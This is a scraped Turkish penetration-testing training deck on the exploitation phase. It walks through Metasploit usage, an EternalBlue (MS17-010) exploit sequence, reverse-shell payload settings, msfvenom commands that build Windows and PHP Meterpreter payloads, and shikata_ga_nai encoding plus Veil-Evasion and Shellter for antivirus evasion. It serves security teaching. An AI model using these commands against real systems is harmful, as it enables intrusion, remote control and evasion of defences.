SlideShare a Scribd company logo
1 of 65
www.prismacsi.com
© All Rights Reserved.
1
Uygulamalı Beyaz
Şapkalı Hacker Eğitimi
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz.
Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
2
Exploit Aşaması
www.prismacsi.com
© All Rights Reserved.
3
Exploit Aşaması Konuları
• Exploit Nedir?
• Exploit Çeşitleri
• Local, remote ve 0day exploitler
• Exploit Veritabanları
• Örnek Exploit Senaryoları
• Exploit Derleme ve Kullanım Senaryoları
• Exploit Frameworkleri
• Payload Kavramı
• Metasploit Framework
• Antivirüs Atlatma Yazılımları
• Veil-Evasion
• Shellter
• Uygulamalar
www.prismacsi.com
© All Rights Reserved.
4
Temel Kavramlar
• Exploit nedir?
• Bir zafiyeti sömürmek amacıyla geliştirilmiş araçlara verilen isimdir.
• Sömürü kodu olarak da adlandırılır.
• Local Exploit
• Remote Exploit
• Web Exploit
• DoS Exploit
• 0day Exploit
• Payload nedir?
• Exploit sonrası yapılması isteneni gerçekleştiren zararlı kod parçası
www.prismacsi.com
© All Rights Reserved.
5
Exploit Veritabanları
• Exploitlerin toplu olarak bulunduğu
veritabanlarıdır. Bu veritabanlarında
keşfedilen yazılım ve servisler için
exploit aranabilir.
• Exploit-db.com
• Securityfocus.com
• 0day.today
• Exploits.shodan.io
• Iedb.ir
• Cxsecurity.com/exploit
• Rapid7.com/db
www.prismacsi.com
© All Rights Reserved.
6
Exploit Geliştirme Dilleri
• Exploitler genelde hangi dillerde yazılıyor?
• Python
• C / C++
• Perl
• PHP
• Ruby
• Framework ihtiyacı neden doğdu?
• Metasploit Framework örneği
www.prismacsi.com
© All Rights Reserved.
7
Exploit Derleme / Kullanım – Uygulama
www.prismacsi.com
© All Rights Reserved.
8
Exploit Düzenleme
• Exploitler her sistem üzerinde çalışmaz.
• İşletim sistemi, işlemci mimarisi, sistem dili gibi farklı özelliklere göre parametreler değişebilir.
• Bu durumda exploiti düzenlemek ve daha sonrasında çalıştırmak gerekir.
• Denemeler için hedef sistemin birebir kopyası laboratuvar ortamında oluşturulabilir.
• Tek bir saldırı hakkınız varmış gibi düşünün!
• Sistem crash olursa her şey bitebilir.
www.prismacsi.com
© All Rights Reserved.
9
Exploit Örneği - Senaryo
• Bir bankanın kredi hesaplama alanını düşünün!
• Hesaplama nerede yapılıyor? ( Server? Client? )
• Senaryoda belirtilen isteği bir python scripti ile 1 dakika içinde
binlerce kez yaparsak?
• Basit bir DoS Exploiti J
www.prismacsi.com
© All Rights Reserved.
10
Exploit Frameworkler
• Metasploit Community
• Metasploit Pro
• Core Impact
• Exploithub
• BeEF
www.prismacsi.com
© All Rights Reserved.
11
Metasploit Framework
• Metasploit Framework
• Kurulum
• Temel komutlar
• Auxiliary modülleri
• Exploit kullanımı
• Payload listesi ve Meterpreter kullanımı
• Çıktı analizleri
• Post Exploitation
www.prismacsi.com
© All Rights Reserved.
12
Metasploit Framework
• Açık kaynak geliştirilen bir yazılım.
• Pro versiyonu da var fakat bize
community yeterli olacaktır.
• Exploitler
• Payloadlar
• Auxiliary modülleri
• Encoderlar
• Post exploitler
www.prismacsi.com
© All Rights Reserved.
13
Metasploit Framework
• Kurulum için aşağıdaki adresi ziyaret edebilirsiniz:
• https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• Güncelleme:
• msfupdate
www.prismacsi.com
© All Rights Reserved.
14
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
15
Metasploit Framework
• Başlangıç
• msfconsole
ile komut satırına inebilirsiniz.
• db_status
komutu ile veritabanının
durumunu kontrol edebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
16
Metasploit Framework
• Workspace kavramı
• workspace
komutu ile çalışma alanlarını
listeleyin.
• workspace -a prisma
prisma çalışma alanını yaratın.
• workspace prisma
prisma çalışma alanına geçiş yapın.
• workspace -d prisma
prisma çalışma alanını silin.
www.prismacsi.com
© All Rights Reserved.
17
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
18
Metasploit Framework
• Nessus, Nmap çıktıları ile çalışma
Tarama yazılımlarının çıktılarını metasploit ile entegre bir şekilde kullanabilirsiniz. Bu Metasploit
Framework’ün en güzel özelliklerinden birisidir.
• db_import nmap.xml
nmap çıktısını import edebilirsiniz.
• db_import nessus-report.nessus
nessus çıktısını import edebilirsiniz.
• db_export -f xml /tmp/prisma.xml
çalışma alanınızdaki verileri export edebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
19
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
20
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
21
Metasploit Framework
• Workspace içerisinde bulunan veriler:
• hosts
• services
• creds
• loots
www.prismacsi.com
© All Rights Reserved.
22
Metasploit Framework
• Hosts komutu
• Db_nmap –sS –Pn –n 10.0.1.0/24
Komutu ile bir nmap taraması gerçekleştirebilirsiniz. Bu komutun çıktısı sonrası keşfedilen tüm IP
adresleri hosts komutu ile görüntülenebilir olacaktır.
• Komutun tüm işlevlerine hosts –h ile erişebilirsiniz.
• hosts –R komutu ile adresleri RHOST parametresine atayabilirsiniz.
www.prismacsi.com
© All Rights Reserved.
23
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
24
Metasploit Framework
• Services komutu
• db_nmap –sS –Pn –n 10.0.1.0/24 –sV
Komutu ile bir nmap taraması gerçekleştirebilirsiniz. Bu komutun çıktısı sonrası tüm IP adresleri üzerinde
bulunan portlar ve üstünde çalışan servisleri services komutu ile görüntüleyebilirsiniz.
• Komutun tüm işlevlerine services –h ile erişebilirsiniz.
• services –p 445
• services –S http
• services –p 80 -R
www.prismacsi.com
© All Rights Reserved.
25
Metasploit Framework
www.prismacsi.com
© All Rights Reserved.
26
Metasploit Temel Komut Listesi
• help
• Yardım komutu
• banner
• Şekil fotoğraflar çekinebilmenize olanak sağlar J
• info
• Herhangi bir plugin için bilgi alabilirsiniz
• info exploit/windows/smb/psexec
• search
• Arama komutu
• search ms17-010
www.prismacsi.com
© All Rights Reserved.
27
Metasploit Temel Komut Listesi
• use
• Exploiti seçmemizi sağlar
• use exploit/windows/smb/psexec
• set
• Exploit
• info
• Herhangi bir plugin için bilgi alabilirsiniz
• info exploit/windows/smb/psexec
• search
• Arama komutu
• search ms17-010
www.prismacsi.com
© All Rights Reserved.
28
Metasploit Framework - Help
www.prismacsi.com
© All Rights Reserved.
29
Metasploit Framework - Banner
www.prismacsi.com
© All Rights Reserved.
30
Metasploit Framework - Info
www.prismacsi.com
© All Rights Reserved.
31
Metasploit Temel Komut Listesi
• set
• Bir parametreye değer atamak için kullanılır.
• set RHOST 10.0.1.5
• setg
• Parametreye değer global olarak atanır.
• unset
• Parametredeki değer sıfırlanır.
• show
• Adı üstünde J
• use
• Bir plugini aktifleştirmek için kullanılır.
www.prismacsi.com
© All Rights Reserved.
32
Metasploit Temel Komut Listesi
• run ve exploit
• Bir plugini çalıştırmak istediğinizde kullanabilirsiniz.
• load ve unload
• Bir modülü aktifleştirmek ve pasifleştirmek için kullanabilirsiniz.
• exit
• Çıkış komutu
www.prismacsi.com
© All Rights Reserved.
33
Metasploit Show Komutu
• show payloads
• Payloadları listele
• show targets
• Bir plugin için atak yapmaya uygun işletim sistemlerini listele
• show options
• Bir plugin için ayar parametrelerini göster
• show encoders
• Encoderları listele
www.prismacsi.com
© All Rights Reserved.
34
Auxillary Modülleri ve Kullanımı
• show auxillary
• search smb_login
• use auxillary/dos/windows/rdp/ms12_020
• set RHOST
• set RPORT
• run
www.prismacsi.com
© All Rights Reserved.
35
Exploit Denemesi (MS17-010)
• search netapi
• info exploit/windows/smb/ms17_010_eternalblue
• use exploit/windows/smb/ms17_010_eternalblue
• show options
• set payload windows/meterpreter/bind_tcp
• set LHOST,
• set RHOST
• set RPORT
• exploit
www.prismacsi.com
© All Rights Reserved.
36
Payload Örnekleri
• set PAYLOAD windows/meterpreter/reverse_http
• set PAYLOAD windows/shell/bind_tcp
• set PAYLOAD linux/x86/meterpreter/reverse_https
• set PAYLOAD php/meterpreter/bind_tcp
• set PAYLOAD java/meterpreter/bind_tcp
• set PAYLOAD /windows/vncinject/reverse_tcp
www.prismacsi.com
© All Rights Reserved.
37
Reverse/Bind Shell
www.prismacsi.com
© All Rights Reserved.
38
Session Yönetimi
• exploit/multi/handler
• Dinleyici olarak kullanabilirsiniz.
• Dinleyicinin birden fazla hedeften bağlantı alabilmesi için jobs olarak çalıştırabilirsiniz.
• jobs görevi için:
• exploit –j
• jobs komutu ile listeleme yapabilirsiniz.
www.prismacsi.com
© All Rights Reserved.
39
Session Yönetimi
• sessions komutu ile elde edilmiş tüm oturumları kontrol edebilirsiniz.
• sessions –l : listeleme
• session –i 1 : 1. session ile etkileşime geç
• sessions –K : tüm sessionları bitir
• sessions –u : oturumu meterpreter oturumuna yükselt
• kill : sessionı öldürmek için kullanılır.
• background : sessionı arka plana alır ve metasploit konsola geri döner.
www.prismacsi.com
© All Rights Reserved.
40
Exploit Arama
• Searchsploit
www.prismacsi.com
© All Rights Reserved.
41
Msfvenom nedir?
• Hedef sistemde doğrudan atak yapılabilecek bir zafiyet olmayabilir.
• Bu durumda farklı yollar ile sisteme sızmayı denemek gerekebilir.
• Örneğin yaratılacak bir zararlı exe nin bir şekilde sisteme yüklemesi başarılı olur ve bu zararlı dosya
çalıştırılabilirse sistem ele geçirilebilir.
• Veya file upload zafiyeti yakaladığınız bir web uygulamasına php ile yazılmış zararlı shell yüklemek ve bu
zararlı ile birlikte bir metasploit üzerine terminal bağlantısı almak isteyebilirsiniz.
• İşte burada devreye msfvenom giriyor!
www.prismacsi.com
© All Rights Reserved.
42
Msfvenom Kullanımı
• Msfvenom temel kullanım komutları
• msfvenom -h
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe
• msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php
• msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
www.prismacsi.com
© All Rights Reserved.
43
Msfvenom AV Atlatma - Uygulamalar
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15
-f exe -o shell.exe
www.prismacsi.com
© All Rights Reserved.
44
Msfvenom Yardım
www.prismacsi.com
© All Rights Reserved.
45
Msfvenom PHP Payload İçeriği
www.prismacsi.com
© All Rights Reserved.
46
Metasploit Ek Plugin Yükleme
• https://github.com/darkoperator/Metasploit-Plugins
www.prismacsi.com
© All Rights Reserved.
47
Metasploit Özellik Ekleme
• Dosyalar manuel olarak ~/.msf4/plugin/ altına yüklenir.
www.prismacsi.com
© All Rights Reserved.
48
Armitage Kullanımı
• Metasploit Framework GUI
• Çok daha hızlı aksiyon almak için kullanılıyor
• Arayüzü sayesinde kullanımı console uygulamasına göre biraz daha kolay
www.prismacsi.com
© All Rights Reserved.
49
Armitage Kullanımı
• Host ekleme
www.prismacsi.com
© All Rights Reserved.
50
Armitage Kullanımı
• Host tarama
www.prismacsi.com
© All Rights Reserved.
51
Armitage Kullanımı
• Tarama Sonucu
www.prismacsi.com
© All Rights Reserved.
52
Armitage Kullanımı
• Atak vektörlerinin keşfi
www.prismacsi.com
© All Rights Reserved.
53
Armitage Kullanımı
• Java_rmi_attack
www.prismacsi.com
© All Rights Reserved.
54
Armitage Kullanımı
• Java_rmi_attack
• Meterpreter oturumu
www.prismacsi.com
© All Rights Reserved.
55
Antivirüs Atlatma Araçları
• Hedef sistemlerde bir antivirüs mekanizması bulunabilir.
• Bu durumda saldırıları çok daha temkinli gerçekleştirmek gerekir.
• Antivirüsleri atlatmak amacıyla geliştirilmiş araçlar bulunmaktadır.
• Kullanılan Araçlar
• Veil-Evasion
• Shellter
• Av0id
• Msfvenom
www.prismacsi.com
© All Rights Reserved.
56
Veil-Evasion Kurulumu
www.prismacsi.com
© All Rights Reserved.
57
Veil-Evasion Payload Seçimi
www.prismacsi.com
© All Rights Reserved.
58
Veil-Evasion Payload Ayarları
www.prismacsi.com
© All Rights Reserved.
59
Veil-Evasion Payload Üretimi - DEMO
www.prismacsi.com
© All Rights Reserved.
60
Virustotal Taraması
www.prismacsi.com
© All Rights Reserved.
61
Shellter Kurulum
www.prismacsi.com
© All Rights Reserved.
62
Shellter Kullanımı – DEMO
www.prismacsi.com
© All Rights Reserved.
63
Virustotal Taraması
www.prismacsi.com
© All Rights Reserved.
64
UYGULAMALAR
www.prismacsi.com
© All Rights Reserved.
65
Sorular?

More Related Content

What's hot

W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIBGA Cyber Security
 
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm ÖnerileriHosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm ÖnerileriBGA Cyber Security
 
Apache Htaccess Güvenlik Testleri
Apache Htaccess Güvenlik TestleriApache Htaccess Güvenlik Testleri
Apache Htaccess Güvenlik TestleriBGA Cyber Security
 
Web Uygulama Güvenliği
Web Uygulama GüvenliğiWeb Uygulama Güvenliği
Web Uygulama GüvenliğiMesut Güngör
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAhmet Gürel
 
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriEPICROUTERS
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...OWASP Turkiye
 
Microsoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarMicrosoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarAdeo Security
 
Binary Modification [Patching]
Binary Modification [Patching]Binary Modification [Patching]
Binary Modification [Patching]BGA Cyber Security
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak DerslerBGA Cyber Security
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıBGA Cyber Security
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...OWASP Turkiye
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik Konferansı
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber Security
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA Cyber Security
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıBGA Cyber Security
 
Hacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellHacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellAdeo Security
 

What's hot (20)

W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – II
 
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm ÖnerileriHosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
 
Apache Htaccess Güvenlik Testleri
Apache Htaccess Güvenlik TestleriApache Htaccess Güvenlik Testleri
Apache Htaccess Güvenlik Testleri
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
Web Uygulama Güvenliği
Web Uygulama GüvenliğiWeb Uygulama Güvenliği
Web Uygulama Güvenliği
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim Araçları
 
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
 
Microsoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarMicrosoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif Saldirilar
 
Binary Modification [Patching]
Binary Modification [Patching]Binary Modification [Patching]
Binary Modification [Patching]
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
 
Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması Çözümleri
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
 
Hacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellHacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShell
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması

Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiFatih Ozavci
 
Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Murat KARA
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber Security
 
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari Oluşturma
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari OluşturmaSymfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari Oluşturma
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari OluşturmaHüseyin Mert
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6BGA Cyber Security
 
Metasploit framework ile exploit gelistirme 2013 1.5
Metasploit framework ile exploit gelistirme   2013 1.5Metasploit framework ile exploit gelistirme   2013 1.5
Metasploit framework ile exploit gelistirme 2013 1.5Canberk Bolat
 
Metasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeMetasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeFatih Ozavci
 
Heybe Pentest Automation Toolkit - Sec4U
Heybe Pentest Automation Toolkit - Sec4U Heybe Pentest Automation Toolkit - Sec4U
Heybe Pentest Automation Toolkit - Sec4U Bahtiyar Bircan
 
vSphere Integrated Containers
vSphere Integrated ContainersvSphere Integrated Containers
vSphere Integrated ContainersVahric Muhtaryan
 
Cryptospot kullanım kılavuzu (v1.6.0)
Cryptospot   kullanım kılavuzu (v1.6.0)Cryptospot   kullanım kılavuzu (v1.6.0)
Cryptospot kullanım kılavuzu (v1.6.0)Neyasis Technology
 
Python programlama
Python programlamaPython programlama
Python programlamaMurat KARA
 
Zend Framework'e Hizli Giris
Zend Framework'e Hizli GirisZend Framework'e Hizli Giris
Zend Framework'e Hizli Girissascoms
 
2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği
2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği
2010 Kocaeli Linux Günleri - Linux Web GeliştiriciliğiBurak Oğuz
 
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}Chroot içinde {DNS, NTP, Nginx, PHP-FPM}
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}Ali Erdinc Koroglu
 
WordPress ile buyuk olcekli siteler
WordPress ile buyuk olcekli sitelerWordPress ile buyuk olcekli siteler
WordPress ile buyuk olcekli sitelerMustafa UYSAL
 
Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Cihan Özhan
 
Go Programlama Dili - Seminer
Go Programlama Dili - SeminerGo Programlama Dili - Seminer
Go Programlama Dili - SeminerCihan Özhan
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması (20)

Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik Denetimi
 
Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari Oluşturma
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari OluşturmaSymfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari Oluşturma
Symfony2 ve Doctrine ile PostgreSQL'i Kullanarak Performanslı Mimari Oluşturma
 
Merhaba Sinatra
Merhaba SinatraMerhaba Sinatra
Merhaba Sinatra
 
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Metasploit framework ile exploit gelistirme 2013 1.5
Metasploit framework ile exploit gelistirme   2013 1.5Metasploit framework ile exploit gelistirme   2013 1.5
Metasploit framework ile exploit gelistirme 2013 1.5
 
Metasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeMetasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit Gelistirme
 
Heybe Pentest Automation Toolkit - Sec4U
Heybe Pentest Automation Toolkit - Sec4U Heybe Pentest Automation Toolkit - Sec4U
Heybe Pentest Automation Toolkit - Sec4U
 
vSphere Integrated Containers
vSphere Integrated ContainersvSphere Integrated Containers
vSphere Integrated Containers
 
Cryptospot kullanım kılavuzu (v1.6.0)
Cryptospot   kullanım kılavuzu (v1.6.0)Cryptospot   kullanım kılavuzu (v1.6.0)
Cryptospot kullanım kılavuzu (v1.6.0)
 
Python programlama
Python programlamaPython programlama
Python programlama
 
Zend Framework'e Hizli Giris
Zend Framework'e Hizli GirisZend Framework'e Hizli Giris
Zend Framework'e Hizli Giris
 
2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği
2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği
2010 Kocaeli Linux Günleri - Linux Web Geliştiriciliği
 
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}Chroot içinde {DNS, NTP, Nginx, PHP-FPM}
Chroot içinde {DNS, NTP, Nginx, PHP-FPM}
 
WordPress ile buyuk olcekli siteler
WordPress ile buyuk olcekli sitelerWordPress ile buyuk olcekli siteler
WordPress ile buyuk olcekli siteler
 
Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)
 
Go Programlama Dili - Seminer
Go Programlama Dili - SeminerGo Programlama Dili - Seminer
Go Programlama Dili - Seminer
 

More from PRISMA CSI

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log ToplamaPRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
